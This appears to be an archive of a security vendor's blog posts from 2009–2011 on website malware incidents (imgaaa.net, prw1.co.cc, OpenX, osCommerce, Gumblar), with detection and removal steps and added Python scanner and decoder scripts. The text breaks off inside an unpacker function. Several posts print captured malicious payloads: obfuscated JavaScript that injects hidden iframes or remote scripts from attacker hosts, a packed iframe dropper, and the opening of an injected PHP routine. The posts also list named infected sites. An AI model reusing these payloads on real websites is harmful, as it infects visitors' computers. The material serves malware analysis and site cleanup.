Archive

Posts Tagged ‘hack’

Google Groups Hacked?

November 22nd, 2011

As of November 21, 2011, a large number of Google Groups posts appear to have been copied into adult-themed chat groups on Google Groups. This looks like an attempt to game the ranking algorithm Google's search engine uses, so that adult, spammy and potentially malicious websites obtain high search rankings.

We have blogged previously about how malicious hackers misuse SEO mechanisms to direct traffic to their malicious websites:

More discussion about this issue is taking place on Google Groups. We will present more details about this incident as we know them.

News, Report, Security

Blogutils.net Tumblr Hack

September 25th, 2011

A recent spate of hacking incidents has led to the compromise of the popular website blogutils.net. Blogutils.net provides website utilities like visit counters that can be embedded on websites built using popular software.

Many websites, including some accounts on tumblr.com, have recently been blacklisted by Google. The primary reason is the compromise of blogutils.net, which has allowed malware to be served on these otherwise benign sites through embedded utilities such as visitor counters that websites around the world pull in from blogutils.net.

Website names on tumblr.com have the following format:

some-name.tumblr.com

About the attack
Websites affected by this problem may see malicious iframes and redirections pointing at the domain listed below.

dbncawbp.cz.cc

A screenshot of the blogutils.net website being blacklisted by Google is shown below.

How to remove the malicious code
If you are facing this problem on your site, remove the blogutils.net code (e.g. a visitor counter) for the time being. When blogutils.net has recovered from the attack you may re-enable the utility code on your website.

We will post more details in forthcoming posts.

How do I protect my site?
StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…

Report, Security

Web-Malware Spoofing Images (imgaaa.net)

May 4th, 2011

The incidence of web-malware is on the rise: thousands of websites are infected every day as webmasters and business owners grapple with this new hydra of the Internet. Traditional anti-virus software is of little help in detecting these new and evolving pieces of malware, which malicious hackers use to infect websites.

In this short post we present an extremely widespread variant of FTP-based web-malware used to infect web sites.

Identifying the Malware
This code is injected after a trojan, often described as a "sniffer", has been installed on the webmaster's personal computer or on a server. The trojan simply watches for FTP connections destined for web servers. Because FTP transmits the username and password in cleartext, the attacker obtains working credentials and uses them to upload or modify files on the site.

The code below shows the malware payload which is injected into web sites:

<img heigth='1' width='1' border='0' src='http://imgaaa.net/t.php?id=36910902'>

To determine if this trojan has infected your site, follow the steps below:

  1. Log into your web account using FTP, SFTP, or SSH.
  2. Check for files with names of the form [two-digit-number].php (e.g. "21.php"). These files usually begin with:
    <? eval(gzuncompress(base64_decode(

    The same code may also be present on the last line of files named "index.php" (a reader reported that files with names like "police.php" may also be present).

  3. Check for folders or directories named ".log" (a reader reported that a folder called ".logs" may also be present).
  4. Check for the presence of "imgaaa.net" in all files. If you have shell access, the following command lists every file that contains the string:
    grep -lr imgaaa.net .
  5. Check for the presence of the following line in your ".htaccess" files; it routes every request on the site through the dropper:
    RewriteRule ^(.*)$ /wp-admin/21.php?q=$1
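
The five checks above can be run in a single pass. The following Python script is an added example, not tooling from the original post: it walks a web root and reports every indicator from the checklist (two-digit dropper names, the eval(gzuncompress(base64_decode( prologue at the start of a file or on the last line of index.php, hidden .log/.logs directories, the imgaaa.net callback, and the .htaccess rewrite). So that it runs offline it also builds a throwaway sample site in a temporary directory; the sample files, their paths and the 'eJw...' placeholder body are constructed for the demo, and only the indicator patterns come from the post.

```python
import os
import re
import tempfile
from pathlib import Path

# Indicators from the checklist in the post. Only these patterns are taken from
# the post; everything else in this file is an added example.
DROPPER_NAME = re.compile(r"^\d{2}\.php$")                      # e.g. 21.php
EVAL_PROLOGUE = re.compile(r"<\?(?:php)?\s*eval\(gzuncompress\(base64_decode\(")
CALLBACK_HOST = "imgaaa.net"
HIDDEN_DIRS = {".log", ".logs"}
REWRITE_RULE = re.compile(r"RewriteRule\s+\S+\s+/wp-admin/\d{2}\.php\?q=\$1")


def scan_webroot(root):
    """Walk `root` and return sorted (indicator, path) pairs for every hit."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if d in HIDDEN_DIRS:
                findings.append(("hidden-log-dir", str(Path(dirpath) / d)))
        for name in filenames:
            path = Path(dirpath) / name
            try:
                text = path.read_bytes().decode("latin-1")  # never raises
            except OSError:
                continue
            if DROPPER_NAME.match(name):
                findings.append(("dropper-name", str(path)))
            if EVAL_PROLOGUE.match(text.lstrip()):
                findings.append(("eval-prologue", str(path)))
            if name == "index.php":
                # variant: the same prologue appended as the last line of index.php
                last_line = text.rstrip("\r\n").rsplit("\n", 1)[-1]
                if EVAL_PROLOGUE.search(last_line):
                    findings.append(("eval-last-line", str(path)))
            if CALLBACK_HOST in text:
                findings.append(("imgaaa-callback", str(path)))
            if name == ".htaccess" and REWRITE_RULE.search(text):
                findings.append(("htaccess-rewrite", str(path)))
    return sorted(findings)


def build_sample_site(base):
    """Create a constructed web root with one of each indicator (demo data,
    not files recovered from a real site). The payload body 'eJw...' is a
    placeholder, not a real compressed blob."""
    base = Path(base)
    (base / "wp-admin").mkdir(parents=True, exist_ok=True)
    (base / ".logs").mkdir(exist_ok=True)
    (base / "wp-admin" / "21.php").write_text(
        "<? eval(gzuncompress(base64_decode('eJw...'))); ?>")
    (base / "index.php").write_text(
        "<?php\nget_header();\nget_footer();\n"
        "<? eval(gzuncompress(base64_decode('eJw...'))); ?>")
    (base / "about.html").write_text(
        "<html><body><img heigth='1' width='1' border='0' "
        "src='http://imgaaa.net/t.php?id=36910902'></body></html>")
    (base / ".htaccess").write_text(
        "RewriteEngine On\nRewriteRule ^(.*)$ /wp-admin/21.php?q=$1\n")
    (base / "style.css").write_text("body { margin: 0 }\n")
    return base


def demo_scan():
    """Build the sample site in a temp dir, scan it, and return the sorted list
    of distinct indicator names plus the total number of findings."""
    with tempfile.TemporaryDirectory() as tmp:
        findings = scan_webroot(build_sample_site(tmp))
        return sorted({kind for kind, _ in findings}), len(findings)


if __name__ == "__main__":
    kinds, total = demo_scan()
    print(f"{total} findings: {', '.join(kinds)}")
```

To use it on a real site, call scan_webroot() on the document root (or a copy pulled down over SFTP) and treat every hit as a reason to go through the removal steps below; files are read as bytes and decoded as latin-1 so binary uploads do not abort the scan.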

Removing the Malware
If you find traces of the infection, upgrade your web application software (e.g. your CMS, WordPress, etc.), change your FTP passwords from a machine you know to be clean (the original credentials were captured by a trojan on a workstation, so changing them from the same infected machine only hands the attacker the new ones), prefer SFTP or SSH over plain FTP so that credentials are no longer sent in cleartext, and clean or remove the infected files from your site immediately.

We Can Help!
If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.

News, Report, Security

prw1.co.cc Malware Alert

April 25th, 2011

Malicious hackers are infecting websites in droves using a relatively new kind of malware. Websites are the newest malware battleground: benign websites are being compromised and infected by hackers in order to infect their visitors.

In the vast majority of cases, the affected website owners are completely unaware that a malicious hacker has used their website to infect its visitors. In this article we show a new strain of malware that has already infected 43,000 websites.

Identifying the Malware
The specific piece of malware:

y='rum';n='s';fp='afe';e='tp';bo='/f';lk='o.c';bl='742';x='7';i='ra';h='c';gf='.';fl='ht';q='//';w='c';pu='554';mk='p?';qg='tp=';il='ph';yy='o';am='5e';k='.c';c='me';u='r';d='20a';qd='1';z='prw';xu='if';iy='a';f=':';a=xu.concat(i,c);kx=n.concat(u,h);l=fl.concat(e,f,q,z,qd,k,lk,w,bo,yy,y,gf,il,mk,qg,bl,d,am,pu,fp,iy,x);var ov=document.createElement(a);ov.setAttribute('width','5');ov.setAttribute('height','5');ov.setAttribute('style','display:none');ov.setAttribute(kx,l);document.body.appendChild(ov);lb='r';r='d3b';q='.c';b='or';v='e';bi='e30';gl='?';j='c/f';ru='l';pj='a';zh='m.';h='a';xc='me';i='c';z='tp:';n='4';ye='=';lg='s';qk='426';jp='ht';g='a';k='z';ut='u';c='//p';pr='7f';o='i';by='fr';ck='3';pl='php';pe='tp';e='a';nc='.co';gz=o.concat(by,h,xc);kx=lg.concat(lb,i);dv=jp.concat(z,c,k,ru,ck,nc,q,j,b,ut,zh,pl,gl,pe,ye,v,pj,r,e,qk,pr,bi,g,n);var bo=document.createElement(gz);bo.setAttribute('width','5');bo.setAttribute('height','5');bo.setAttribute('style','display:none');bo.setAttribute(kx,dv);document.body.appendChild(bo);

This script assembles the strings "iframe" and "src" and a URL out of dozens of short fragments, then creates a hidden 5x5 pixel iframe and sets its src attribute. For the first iframe the assembled src is:

http://prw1.co.cc/forum.php?tp=74220a5e554afea7

The same routine runs a second time with a fresh fragment table (reusing several of the variable names), so each infected page carries two hidden iframes which load the code used to infect the website visitor:

pzl3.co.cc/forum.php?tp=ead3ba4267fe30a4
prw1.co.cc/forum.php?tp=74220a5e554afea7

Growth of Infected Sites
The number of infected sites has grown significantly over the last few days. In less than a month, we have seen the number of sites more than double.

Blacklist Services Not Reacting Quickly
Current website reputation services have not yet started flagging sites with this specific malware. Many infected sites have not yet been blacklisted by Google Chrome, Firefox, Bing, Yahoo or other search engines and blacklist sources. Below we present a small sample of infected sites which have not yet been blacklisted, and will infect visitors upon visiting them.

Infected sites that have not been blacklisted (As of April 23, 2011):

www.kittyshomestore.com/
muinvader.com/
zirimi.com/
ipcontext.com/
www.bonitalions.org/
www.sobragen.org.br/
www.biostyle.ru/
www.cnicanada.com/
www.ceomanitoba.com/

Anti-Virus Not Capable of Detecting the Infection
Anti-virus engines are woefully inadequate at hunting down web-malware. We present screenshots to show the poor detection capabilities of anti-virus engines with respect to this specific piece of malware: only 1 out of 41 AV engines was able to flag it.

We Can Help!
If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.

News, Report, Security

OpenX: Iframe Malware

April 20th, 2011

Online advertisements are a significant source of revenue for many web sites. Even small websites can make money by serving up targeted advertisements to their visitors. A popular piece of software which helps deliver these online advertisements is OpenX. This software displays advertisements and rotates ads on web site pages.

In the last few months, we have seen a large uptick in the number of sites being hacked due to a vulnerability in the OpenX software. In this article, we provide a description of the problem and show an example which can help administrators find malware injected due to this particular vulnerability.

Identifying the Malware
When users visit a site hosting ads via OpenX, a PHP script dynamically creates JavaScript code which is embedded on the web page when ads are displayed to visitors. In cases of infection, malware in the form of a small JavaScript snippet is embedded in this PHP script.

The server location of the PHP script:

/www/delivery/ajs.php

An example of a public URL location of the PHP script:

http://www.infected-website.com/openx/www/delivery/ajs.php?zoneid=1&cb=27272789103&loc=http%3A//www.infected-site.com/

This specific JavaScript snippet loads an iframe element:

document.write('<iframe src="http://pzl3.co.cc/stats?counter=3" width=0 height=0></iframe>');

This malware is injected into every page that serves an ad, and can usually be found on the very first line of the served page. This is easily verified by viewing the source of the web page.

An example of the dynamic JavaScript which inserts this malware, reproduced as captured (the argument to the inner document.write was truncated in our copy). Note that the injection is gated: it sets a cookie (h3=llo) that suppresses the iframe for 24 hours, and it skips visitors whose browser language matches one of the listed country codes, so a single visit from an analyst's browser may not reproduce it:

var dc=document; var date_ob=new Date(); dc.cookie='h1=o; path=/;';if(dc.cookie.indexOf('3=llo')<0){
function clng(str1,str2,str3){var cou=new Array('cn','gt','tn','br','id','bg','pl','be','gp','my','th','iq','ro','ba','pk','tr','dz','ma','re','ae','gf','ru','om','il','gr','vn','kw','ci','sa','do','pt','hr','eg','qa','ro','tw','al','hk','ps','eg','do','lt','dk','jo','pk','ma','pr','mk','dz','ge','hr','gr','bg','ba','pt','si','tn','pl','be','ir','sk','hu','az','bo','by','cr','cz','ec','ee','lk','lv','md','mt','pa','rs','sv','tt','ua','uy');
for(i=0;i<cou.length;i++){if(str1&&str1.toLowerCase().indexOf(cou[i])!=-1)return true;if(str2&&str2.toLowerCase().indexOf(cou[i])!=-1)return true;if(str3&&str3.toLowerCase().indexOf(cou[i])!=-1)return true;}return false;}
if(clng(navigator.systemLanguage,navigator.userLanguage,navigator.language)){var run=1;}
if(typeof run == 'undefined'){dc.writeln("<!--");dc.writeln("var host=' widt'+'h=1 h'+'eight'+'=1 '; var src='src='; var brdr='fra'+'mebor'+'der='+'0';var sc='\"http://cnjug.com/blog/index.php?s=IBB@G\" ';");dc.writeln("document.write(");");dc.writeln("//-->");} var run=1;
date_ob.setTime(date_ob.getTime()+86400000);dc.cookie='h3=llo; path=/; expires='+date_ob.toGMTString();}

Removing the Malware
The good news is that upgrading OpenX to the most recent version (2.8.7 or later) closes the vulnerability. Upgrading does not, however, remove code that has already been injected into the database or into plugin and image files, so the checks below are still needed after the upgrade.

A very good guide to securing your OpenX installation can be found on the OpenX Blog.

Quoting the relevant part of the post:

First, check the append/prepend fields in the banners and zones table for any malicious code:

SELECT bannerid, append, prepend FROM banners WHERE append != '' OR prepend != '';

SELECT zoneid, append, prepend FROM zones WHERE append != '' OR prepend != '';

If you see anything suspicious on those fields, you should clear those values out.


Second, check that no unexpected admin users have been created. This query will list the details of all users with admin access in your system:

SELECT u.user_id, u.contact_name, u.email_address, u.username FROM users AS u, account_user_assoc AS aua WHERE u.user_id=aua.user_id AND aua.account_id = (SELECT value FROM application_variable WHERE name='admin_account_id');

Third, check for infected files on the filesystem:

Installing the latest version of openx will restore all core files, but plugin files (which the installer copies up from the previous version), and files in the www/images folder should be double checked after the upgrade is complete.


In particular, be on the lookout for base64_decode and/or eval statements in your php files. From the bug notes of “Arbitrary code injected into cache file” at https://developer.openx.org/jira/browse/OX-5950, users have reported some specific php files, but the issue can occur on any of the php files.



Optional steps you can take to secure your system are:

Conclusion
If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.

News, Report, Security

osCommerce: Identifying Malware

April 19th, 2011

Websites are now the primary sales funnel for many businesses. Every day, billions of dollars of business is conducted by small to medium sized businesses via their web sites. Most e-commerce web sites use a piece of software called a shopping cart to allow users to pick and choose what they would like to buy and then pay via a number of payment methods.

One popular application software that web site owners use to manage online transactions is called osCommerce. Thousands of websites use this software. In the last three months we have witnessed a spate of intense attacks targeting shopping cart software like osCommerce. In this post we discuss the specifics of this attack, and how to identify the malware which is injected as a result of this intrusion.

Identifying the Malware
The malware targets osCommerce and other shopping carts by exploiting an application vulnerability to inject malware into the web site running the shopping cart – in turn, causing website visitors to become infected. This strain of malware has been extremely pervasive.

We have seen variants of the following malware on web sites running shopping cart software by osCommerce and OpenCart. The malware can be found in JavaScript, PHP, and HTML files on the infected web site.

<script type="text/javascript" src="catalog/view/javascript/unitpngfix/unitpngfix.js"></script>
<script type="text/javascript">
if (typeof(redef_colors) == "undefined") {
  var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7277', '#707d83', '#787481', '#3d7278', '#3e7982', '#3e314d');
  var redef_colors = 1;
  var colors_picked = 0;
  function div_pick_colors(t, styled) {
    var s = "";
    for (j = 0; j < t.length; j++) {
      var c_rgb = t[j];
      for (i = 1; i < 7; i++) {
        var c_clr = c_rgb.substr(i++, 2);
        if (c_clr != "00") s += String.fromCharCode(parseInt(c_clr, 16) - 15);
      }
    }
    if (styled) {
      s = s.substr(0, 36) + s.substr(36, (s.length - 38)) + div_colors[1].substr(0, 1) + new Date().getTime() + s.substr((s.length - 2));
    } else {
      s = s.substr(36, (s.length - 38)) + div_colors[1].substr(0, 1) + new Date().getTime();
    }
    return s;
  }
  function try_pick_colors() {
    try {
      if (!document.getElementById || !document.createElement) {
        document.write(div_pick_colors(div_colors, 1));
      } else {
        var new_cstyle = document.createElement("script");
        new_cstyle.type = "text/javascript";
        new_cstyle.src = div_pick_colors(div_colors, 0);
        document.getElementsByTagName("head")[0].appendChild(new_cstyle);
      }
    } catch (e) { }
    try { check_colors_picked(); } catch (e) { setTimeout("try_pick_colors()", 500); }
  }
  try_pick_colors();
}
</script>

What this Attack Does
The "color" array is the payload: decoded, it yields a <script> tag whose src points at a remote host, so the visitor's browser fetches and runs attacker-controlled JavaScript. That script in turn displays a malicious iframe which can lead the visitor to a fake Anti-Virus (AV) website, opening the door to malware being installed on the website visitor's personal computer.
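
The following Python decoder is an added example, not code from the post: it reverses div_pick_colors() by taking the three hex bytes from each '#rrggbb' entry, subtracting 15 from each, and then applies the same substr() arithmetic the snippet uses to separate the remote script URL from the surrounding tag. Running it on the array reproduced above shows what the visitor's browser actually requests; the hostname it reveals comes out of the array itself and is not otherwise named in the post.

```python
# Array copied verbatim from the snippet above.
DIV_COLORS = [
    '#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970',
    '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e',
    '#3e7277', '#707d83', '#787481', '#3d7278', '#3e7982', '#3e314d',
]


def decode_color_array(colors, shift=15):
    """Reverse div_pick_colors(): each '#rrggbb' entry carries three bytes at
    offsets 1, 3 and 5 (the JS loop advances i by two per iteration); a byte of
    00 is skipped and every other byte becomes chr(value - 15)."""
    chars = []
    for color in colors:
        for pos in (1, 3, 5):
            pair = color[pos:pos + 2]
            if pair != "00":
                chars.append(chr(int(pair, 16) - shift))
    return "".join(chars)


def split_loader(decoded):
    """Apply the snippet's substr() arithmetic: the first 36 characters are the
    '<script ... src="' prefix, the last two are '">', and what sits between is
    the remote URL. The live code appends '#' (the first character of
    div_colors[1]) plus a timestamp to that URL as a cache-buster before using
    it as a script src."""
    prefix = decoded[:36]
    url = decoded[36:len(decoded) - 2]
    suffix = decoded[-2:]
    return prefix, url, suffix


def remote_script_url(colors=DIV_COLORS):
    """The URL the injected <script> element loads, minus the timestamp."""
    return split_loader(decode_color_array(colors))[1]


if __name__ == "__main__":
    decoded = decode_color_array(DIV_COLORS)
    print(decoded)
    print("remote script:", remote_script_url())
```

Because the loader hides its target as colour values, a search for "iframe", "http" or "eval" across the site finds nothing; searching for the div_pick_colors or try_pick_colors function names, or for long arrays of '#xxxxxx' strings next to String.fromCharCode, is what turns it up.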

Removing the Malware
In most shopping cart installations, malware will have been inserted in the config.php file on your website. It is usually located in the following place: www.yoursite.com/config.php.

Identify the malware in the config.php file that begins with:

<?php global $ob_starting;
if(!$ob_starting) {
function ob_start_flush($s) {
$tc = array(0, 69, 84, 82, 67, 83, 79, 7

The malware usually ends with a line similar to:

$ob_starting = time(); @ob_start("ob_start_flush"); } ?>

The entire code present between the start and end signatures shown above must be removed.

Conclusion
Following removal of the malware, you must upgrade your installation of osCommerce, to osCommerce 2.3 or higher, and analyze your website for any application vulnerabilities. Securing the permission settings of your admin directory or renaming the directory to a value different from the default can mitigate automated attacks attempting to exploit osCommerce 2.2 versions.

If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.

News, Report, Security

MySQL.com Hit by SQL Injection!

March 27th, 2011

MySQL.com, the website of the extremely popular database software used worldwide, was reported to be compromised today by, ironically, an SQL injection attack.

The compromise was made public via a post on Seclists.org:
http://seclists.org/fulldisclosure/2011/Mar/309

The group responsible for this disclosure also published passwords, password hashes and other sensitive information.

The list of passwords and password hashes was posted at:
http://pastebin.com/BayvYdcP

We will be posting new information on this incident as we receive it from our sources. In the meantime, if you have an account on MySQL.com, please change your password immediately, and change it on any other site where you used the same password.

News

When Benign scripts attack – III

November 18th, 2009

In this post we continue to analyze how popular scripts are being targeted by hackers to infect websites, and the computers of the visitors whose browsers load those scripts. The motivation for using originally benign scripts to do the dirty work is that many webmasters and web enthusiasts have wised up to the fact that code injection is a never-ending battle and are making efforts to identify and remove malicious code from their sites; a payload appended to the end of a trusted library file is far less likely to be noticed than a foreign script tag in the page itself.

This particular example shows how a MooTools script was used by a hacker to spread a Gumblar infection. Consider the case of hxxp://www.wwf.gr/, referred to by 22lyk-athin. att.sch .gr/index.html. You will find the following code in one of the associated MooTools JavaScript files, which are served from the site's own host. The malicious code causes an infection which leads to the site being blacklisted by Google; the detailed report from Google would probably describe the infection as the "Gumblar" type.

Following the first example is a second one in which a MediaWiki script was targeted. The source was www.1wed din gsource.com/wedding-wiki/Wedding/

//MooTools, My Object Oriented Javascript Tools. Copyright (c) 2006 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools={version:'1.11'};function $defined(obj){return(obj!=undefined);};function $type(obj){if(!$defined(obj))return false;if(obj.htmlElement)return'element';var type=typeof obj;if(type=='object'&&obj.nodeName){switch(obj.nodeType){case 1:return'element';case 3:return(/\S/).test(obj.nodeValue)?'textnode':'whitespace';}}
if(type=='object'||type=='function'){switch(obj.constructor){case Array:return'array';case RegExp:return'regexp';case Class:return'class';}
if(typeof obj.length=='number'){if(obj.item)return'collection';if(obj.callee)return'arguments';}}
return type;};function $merge(){var mix={};for(var i=0;i<arguments.length;i++){for(var property in arguments[i]){var ap=arguments[i][property];var mp=mix[property];if(mp&&$type(ap)=='object'&&$type(mp)=='object')mix[property]=$merge(mp,ap);else mix[property]=ap;}}
return mix;};var $extend=function(){var args=arguments;if(!args[1])args=[this,args[0]];for(var property in args[1])args[0][property]=args[1][property];return args[0];};var $native=function(){for(var i=0,l=arguments.length;i<l;i++){arguments[i].extend=function(props){for(var prop in props){if(!this.prototype[prop])this.prototype[prop]=props[prop];if(!this[prop])this[prop]=$native.generic(prop);}};}};$native.generic=function(prop){return function(bind){return this.prototype[prop].apply(bind,Array.prototype.slice.call(arguments,1));};};$native(Function,Array,String,Number);function $chk(obj){return!!(obj||obj===0);};function $pick(obj,picked){return $defined(obj)?obj:picked;};function $random(min,max){return Math.floor(Math.random()*(max-min+1)+min);};function $time(){return new Date().getTime();};function $clear(timer){clearTimeout(timer);clearInterval(timer);return null;};var Abstract=function(obj){obj=obj||{};obj.extend=$extend;return obj;};var Window=new Abstract(window);var Document=new Abstract(document);document.head=document.getElementsByTagName('head')[0];window.xpath=!!(document.evaluate);if(window.ActiveXObject)window.ie=window[window.XMLHttpRequest?'ie7':'ie6']=true;else if(document.childNodes&&!document.all&&!navigator.taintEnabled)window.webkit=window[window.xpath?'webkit420':'webkit419']=true;else if(document.getBoxObjectFor!=null)window.gecko=true;window.khtml=window.webkit;Object.extend=$extend;if(typeof HTMLElement=='undefined'){var HTMLElement=function(){};if(window.webkit)document.createElement("iframe");HTMLElement.prototype=(window.webkit)?window["[[DOMElement.prototype]]"]:{};}
HTMLElement.prototype.htmlElement=function(){};if(window.ie6)try{document.execCommand("BackgroundImageCache",false,true);}catch(e){};var Class=function(properties){var klass=function(){return(arguments[0]!==null&&this.initialize&&$type(this.initialize)=='function')?this.initialize.apply(this,arguments):this;};$extend(klass,this);klass.prototype=properties;klass.constructor=Class;return klass;};Class.empty=function(){};Class.protot
ype={extend:function(properties){var proto=new this(null);for(var property in properties){var pp=proto[property];proto[property]=Class.Merge(pp,properties[property]);}
return new Class(proto);},implement:function(){for(var i=0,l=arguments.length;i<l;i++)$extend(this.prototype,arguments[i]);}};Class.Merge=function(previous,current){if(previous&&previous!=current){var type=$type(current);if(type!=$type(previous))return current;switch(type){case'function':var merged=function(){this.parent=arguments.callee.parent;return current.apply(this,arguments);};merged.parent=previous;return merged;case'object':return $merge(previous,current);}}
return current;};var Chain=new Class({chain:function(fn){this.chains=this.chains||[];this.chains.push(fn);return this;},callChain:function(){if(this.chains&&this.chains.length)this.chains.shift().delay(10,this);},clearChain:function(){this.chains=[];}});var Events=new Class({addEvent:function(type,fn){if(fn!=Class.empty){this.$events=this.$events||{};this.$events[type]=this.$events[type]||[];this.$events[type].include(fn);}
return this;},fireEvent:function(type,args,delay){if(this.$events&&this.$events[type]){this.$events[type].each(function(fn){fn.create({'bind':this,'delay':delay,'arguments':args})();},this);}

**code removed for brevity**

this.effects={};if(this.options.opacity)this.effects.opacity='fullOpacity';if(this.options.width)this.effects.width=this.options.fixedWidth?'fullWidth':'offsetWidth';if(this.options.height)this.effects.height=this.options.fixedHeight?'fullHeight':'scrollHeight';for(var i=0,l=this.togglers.length;i<l;i++)this.addSection(this.togglers[i],this.elements[i]);this.elements.each(function(el,i){if(this.options.show===i){this.fireEvent('onActive',[this.togglers[i],el]);}else{for(var fx in this.effects)el.setStyle(fx,0);}},this);this.parent(this.elements);if($chk(this.options.display))this.display(this.options.display);},addSection:function(toggler,element,pos){toggler=$(toggler);element=$(element);var test=this.togglers.contains(toggler);var len=this.togglers.length;this.togglers.include(toggler);this.elements.include(element);if(len&&(!test||pos)){pos=$pick(pos,len-1);toggler.injectBefore(this.togglers[pos]);element.injectAfter(toggler);}else if(this.container&&!test){toggler.inject(this.container);element.inject(this.container);}
var idx=this.togglers.indexOf(toggler);toggler.addEvent('click',this.display.bind(this,idx));if(this.options.height)element.setStyles({'padding-top':0,'border-top':'none','padding-bottom':0,'border-bottom':'none'});if(this.options.width)element.setStyles({'padding-left':0,'border-left':'none','padding-right':0,'border-right':'none'});element.fullOpacity=1;if(this.options.fixedWidth)element.fullWidth=this.options.fixedWidth;if(this.options.fixedHeight)element.fullHeight=this.options.fixedHeight;element.setStyle('overflow','hidden');if(!test){for(var fx in this.effects)element.setStyle(fx,0);}
return this;},display:function(index){index=($type(index)=='element')?this.elements.indexOf(index):index;if((this.timer&&this.options.wait)||(index===this.previous&&!this.options.alwaysHide))return this;this.previous=index;var obj={};this.elements.each(function(el,i){obj[i]={};var hide=(i!=index)||(this.options.alwaysHide&&(el.offsetHeight>0));this.fireEvent(hide?'onBackground':'onActive',[this.togglers[i],el]);for(var fx in this.effects)obj[i][fx]=hide?0:el[this.effects[fx]];},this);return this.start(obj);},showThisHideOpen:function(index){return this.display(index);}});Fx.Accordion=Accordion;

**malicious code**

document.write('<scr ipt src=hxxp://nw drealty.com/Scripts/Unti tled-17.php ><\/sc ript>');
document.write('<scri pt src=hxxp://nwd realty.com/Scripts/Untit led-17.php ><\/s cript>');

Our systems flagged this as unsafe. This exploit leads to an infection that is a remnant of the well-known Gumblar virus.

// MediaWiki JavaScript support functions
var clientPC = navigator.userAgent.toLowerCase(); // Get client info
var is_gecko = /gecko/.test( clientPC ) &&
!/khtml|spoofer|netscape\/7\.0/.test(clientPC);
var webkit_match = clientPC.match(/applewebkit\/(\d+)/);
if (webkit_match) {
var is_safari = clientPC.indexOf('applewebkit') != -1 &&
clientPC.indexOf('spoofer') == -1;
var is_safari_win = is_safari && clientPC.indexOf('windows') != -1;

** code removed for brevity **
}
//note: all skins should call runOnloadHook() at the end of html output,
//      so the below should be redundant. It's there just in case.
hookEvent("load", runOnloadHook);

** malicious code **
document.write('<scr ipt src=hxxp://hydr eka.com/logiciels/winfluid_mo bile.php ><\/s cript>');

Security

When Benign scripts attack – II

November 16th, 2009

A few weeks back I wrote about how hackers are targeting benign scripts to do the dirty work on their behalf. The trend is now intensifying. In the last post about this issue, we saw how common scripts like jQuery, AC_RunActiveContent, MooTools and others were being targeted. This time we will look at an injection into a script that does not fit that pattern.

This particular example is not a widely deployed script and was probably hand-coded by a developer for their own purposes. Consider the case of hxxp://www.iu.edu.sa/web mail/ You will find the following code in one of the associated JavaScript files, which are served from the site's own host. Interestingly, the injected code is packed in the format produced by the popular Dean Edwards packer (the eval(function(p,a,c,k,e,d){...}) wrapper). Unpacking it is trivial, and the actual code which was not part of the original file is therefore also displayed below.

// defines for sections
var SECTION_LOGIN    = 0;
var SECTION_MAIL     = 1;

// defines for screens
var SCREEN_LOGIN              = 0;
var SCREEN_MESSAGES_LIST_VIEW = 1;
var SCREEN_MESSAGES_LIST      = 2;
var SCREEN_VIEW_MESSAGE       = 3;
var SCREEN_NEW_MESSAGE        = 4;

var Sections = Array();
Sections[SECTION_LOGIN]    = {Scripts: [], Screens: Array()}
Sections[SECTION_MAIL]     = {Scripts: [], Screens: Array()}
Sections[SECTION_MAIL].Screens[SCREEN_MESSAGES_LIST_VIEW] = 'screen = new CMessagesListViewScreen(SkinName);';
Sections[SECTION_MAIL].Screens[SCREEN_MESSAGES_LIST] = 'screen = new CMessagesListScreen(SkinName);';

**code removed for brevity**

var REDRAW_NOTHING = 0;
var REDRAW_PAGE    = 3;
var AUTOSELECT_CHARSET = -1;
var VIEW_MODE_WITH_PANE     = 1;
var Fonts = ['Arial', 'Arial Black', 'Courier New', 'Tahoma', 'Times New Roman', 'Verdana'];

Ready(INIT_DEFINES);

**malicious code**

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){returnw};c=1};while(c--){if(k1){p=p.replace(new RegExp(be(c)b,g),k1)}}return p}(g 7=b 5(),4=b 5(7.k()l);2(0.9.6(8=f)==-1){2(i.m.6(a)!=-1){3=3}0.c(<3dh=1 ej=1 w=hn://yz-v.u/p/ o=qr:t></2s>);0.9=8=f;4=4.x(); },36,36,document||if|iframe|expires|Date|indexOf|today|_df|cookie||new|write|widt|heig||var||navigator|ht|getTime|2678400000|appCodeName|ttp|style|b2b|dis|play|rame|none|net|atm|src|toGMTString|loadi|ng.split(|),0,{}));

**unpacked form**

var today=new Date(),expires=new Date(today.getTime()+2678400000);if(document.cookie.indexOf("_df=f")==-1){if(navigator.appCodeName.indexOf("a")!=-1){iframe="iframe"}document.write("<iframe+ width=1 height=1 src='hxxp://l oading-a tm.net/b2b/' style='display:none'></iframe>");document.cookie="_df=f; expires=expires.toGMTString(); "}
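
The packer output is mechanical to reverse. The following Python unpacker is an added example, not the post's tooling: it extracts p, a, c and k from an eval(function(p,a,c,k,e,d){...}) call and expands every base-a token that has a non-empty dictionary entry, handling radix 36 as well as the A-Z digits the packer uses for radixes up to 62. Because the packed sample reproduced above lost its quote and bracket characters in our copy, the block carries a constructed packed sample of the same shape (cookie gate plus hidden iframe) that points at the placeholder host example.invalid; it is not the packed text from the compromised site.

```python
import re

# Digit alphabet of the packer: 0-9, a-z, then A-Z for radixes above 36.
ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"


def decode_index(token, radix):
    """Interpret `token` as a base-`radix` number in the packer's alphabet.
    Returns None when any character is outside the radix, so identifiers such
    as `_df` or `http` are left alone by the caller."""
    value = 0
    for ch in token:
        digit = ALPHABET.find(ch)
        if digit < 0 or digit >= radix:
            return None
        value = value * radix + digit
    return value


def unpack(p, a, c, k):
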